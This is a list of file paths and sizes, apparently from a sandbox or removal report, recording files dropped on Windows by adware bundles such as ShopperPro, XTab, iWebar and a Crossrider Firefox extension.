    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\234.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\288.js (969 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button4.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dda43c892e467b84c5c5a65c0f78f43a.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\281.js (461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\83f6d845993575c3d94fcc78e4f7ef92.js (26 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a23949c9b6c9e24ee54e99e4f08ebb4f.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\skin.css (909 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon48.png (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\b445e40fee926becbc6a7fa6a5bf3e58.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\c12defd337be815c0c356e8185da5647.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\379.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\29f86db80793dfda37ea151f81b1eb0a.js (651 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\242.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\6889d563da5c48a8ce768e0edc93745a.js (618 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\12870b8beedc10c7c2e7042a752c1a96.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d3a5f2653762702a2d5ebd74ef211e17.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button1.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1cd092e31d00a3d88980638b1aacad86.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1cfe04157632e78d46fbd4494cd08061.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\5febde0bacdab7a8f3ec6ce44e0b706b.js (964 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7500741a9065ecf69dfd112421772ba4.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\385.js (805 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon128.png (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d558fdbf24bb49e9fd8ea5834f2d8296.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\popup.html (353 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon16.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\28.js (506 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dialog.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.xul (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\be027ac44fbc92bdd651ab8bc10b05b3.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\bedd2ff3c8cd163718841dffba2e2bef.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins.json (24 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\b2d1b826ecaf80956e7bcf1153760d27.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\62284fa1d9293d5cff57e6447dac23c8.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\update.css (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\390.js (829 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\221.js (419 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\2c336850160e00c5eb623004e5ec3aca.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\background.html (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\background.js (640 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\4a3c378be3c0a1c88251e33fb294c23b.js (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\browser.xul (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\acbac258ab8930f55df2737a7623316e.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d4ed991ff40a229a0622e0606a37327b.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\246.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\512TH2I56RW92FW4HP5L.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MOBWFZ73Q1QKEOQLZEYR.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MK8J0L7EHIHKKHBV3N6.temp (196 bytes)
    %Program Files%\Common Files\ShopperPro\spbii64.exe (17848 bytes)
    %Program Files%\Common Files\ShopperPro\spbia.exe (11344 bytes)
    %Program Files% (x86)\ShopperPro\ShopperPro.exe (33633 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\MoreInfo.dll (15 bytes)
    %Program Files%\Common Files\ShopperPro\spbiw.sys (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95F9.tmp (360165 bytes)
    %Program Files%\Common Files\ShopperPro\spbii32.exe (13368 bytes)
    %Program Files% (x86)\ShopperPro\Updater.exe (25112 bytes)
    %Program Files%\Common Files\ShopperPro\spbiu.exe (69777 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\jsdrv.exe (100669 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\AccDownload.dll (11659 bytes)
    %Program Files% (x86)\ShopperPro\FireFox\chrome.manifest (113 bytes)
    %Program Files% (x86)\ShopperPro\FireFox\content\overlay.xul (203 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\nsExec.dll (14 bytes)
    %Program Files%\Common Files\ShopperPro\spbici32.dll (37025 bytes)
    %Program Files% (x86)\ShopperPro\JSDriver\jsdrv.sys (1856 bytes)
    %Program Files% (x86)\ShopperPro\FireFox\content\overlay.js (13 bytes)
    %Program Files% (x86)\ShopperPro\ShopperPro.dll (15168 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\nsProcess.dll (12 bytes)
    %Program Files% (x86)\ShopperPro\FireFox\install.rdf (828 bytes)
    %Program Files%\Common Files\ShopperPro\spbici64.dll (48241 bytes)
    %Program Files% (x86)\ShopperPro\database1_0_0.json (11 bytes)
    %Program Files% (x86)\ShopperPro\SPRemove.exe (20416 bytes)
    %Program Files% (x86)\ShopperPro\ShopperPro64.dll (18424 bytes)
    %Program Files% (x86)\ShopperPro\database1_0_0.ej (14 bytes)
    %Program Files% (x86)\ShopperPro\manifest.json (595 bytes)
    %Program Files% (x86)\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
    %Program Files% (x86)\XTab\conf (1480 bytes)
    C:\Windows\SysWOW64\AniGIF.ocx (172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\uxdfkxs.dll (8 bytes)
    C:\Windows\Tasks\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5_user.job (74 bytes)
    %Program Files% (x86)\App Lid\utils.exe (76402 bytes)
    C:\Windows\Tasks\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5.job (74 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\System.dll (808 bytes)
    %Program Files% (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505.xpi (2321 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\151655 (4095 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\mipntrzne.dll (30112 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.dll (46916 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\zwqnxb.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\rypiyr.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\31686 (91765 bytes)
    %Program Files% (x86)\App Lid\Uninstall.exe (601 bytes)
    %Program Files% (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5.exe (7385 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\igzjjofm.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\raqkdgbq.dll (3410 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\ipgeoapi_com[1].json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\loubc.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd670C.tmp (662695 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\kbfew.dll (13 bytes)
    %Program Files% (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe (9147 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\bg1.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\eg1.zip (178187 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\loading_light.png (139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\bk_shadow.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code1.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\loading_bg.png (159 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\Thumbs.db (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\UninstallManager.exe (60186 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\Thumbs.db (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code2.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\close.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\checkbox.png (545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code3.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\scrollbar.bmp (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\button.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\eg2.zip (217566 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\474.json (512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\checkbox_select.png (783 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\checked.png (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\QQBrowser.exe (5199 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\bg.png (5064 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code6.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code4.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\DataBase (26688 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\button1.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\sweetsearch!1.0.0.1031.xpi (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\quick_searchff#5.4.10.xpi (6360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\conf (79 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\unchecked.png (135 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\MessageBox.xml (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\uninstallDlg2.xml (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code5.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\wwrumuo.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\tyhdzuw.dll (3730 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\4594 (3389 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\rblyvufer.dll (23 bytes)
    C:\Windows\Tasks\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5_user.job (74 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\sfseclo.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\ghcrjjq.dll (31236 bytes)
    %Program Files% (x86)\iWebar\utils.exe (80855 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\gpuiqgk.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nstCACE.tmp (596719 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\dogolylzg.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\System.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\444749 (94253 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\novufxv.dll (14 bytes)
    %Program Files% (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd.xpi (2321 bytes)
    %Program Files% (x86)\iWebar\Uninstall.exe (601 bytes)
    %Program Files% (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe (9654 bytes)
    C:\Windows\Tasks\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5.job (74 bytes)
    %Program Files% (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\ipgeoapi_com[1].json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.dll (49631 bytes)
    %Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
    %Program Files% (x86)\XTab\skin\btn.png (2 bytes)
    %Program Files% (x86)\XTab\install.data (68 bytes)
    %Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
    %Program Files% (x86)\XTab\HPNotify.exe (17941 bytes)
    %Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
    %Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
    %Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
    %Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\ver.txt (47 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
    %Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
    %Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
    %Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
    %Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
    %Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
    %Program Files% (x86)\XTab\CmdShell.exe (1685 bytes)
    %Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
    %Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
    %Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
    %Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\main.xml (4 bytes)
    %Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
    %Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
    %Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
    %Program Files% (x86)\XTab\msvcr110.dll (21280 bytes)
    %Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
    %Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
    %Program Files% (x86)\XTab\ProtectService.exe (5309 bytes)
    %Program Files% (x86)\XTab\web\js\js.js (18 bytes)
    %Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
    %Program Files% (x86)\XTab\skin\logo.png (5 bytes)
    %Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
    %Program Files% (x86)\XTab\web\data.html (20 bytes)
    %Program Files% (x86)\XTab\web\main.css (19 bytes)
    %Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
    %Program Files% (x86)\XTab\skin\close.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst582E.tmp\System.dll (23 bytes)
    %Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
    %Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
    %Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
    %Program Files% (x86)\XTab\skin\about.png (4 bytes)
    %Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\settings.png (5 bytes)
    %Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
    %Program Files% (x86)\XTab\web\js\common.js (2 bytes)
    %Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
    %Program Files% (x86)\XTab\SupTab.dll (15946 bytes)
    %Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
    %Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
    %Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
    %Program Files% (x86)\XTab\msvcp110.dll (16990 bytes)
    %Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\da84c206c2019448521379d2ff837774[1].png (4648 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\jquery.smooth-scroll.min[1].js (194 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\analytics[1].js (16603 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\config[1].json (778 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\logo_illust[1].jpg (6 bytes)
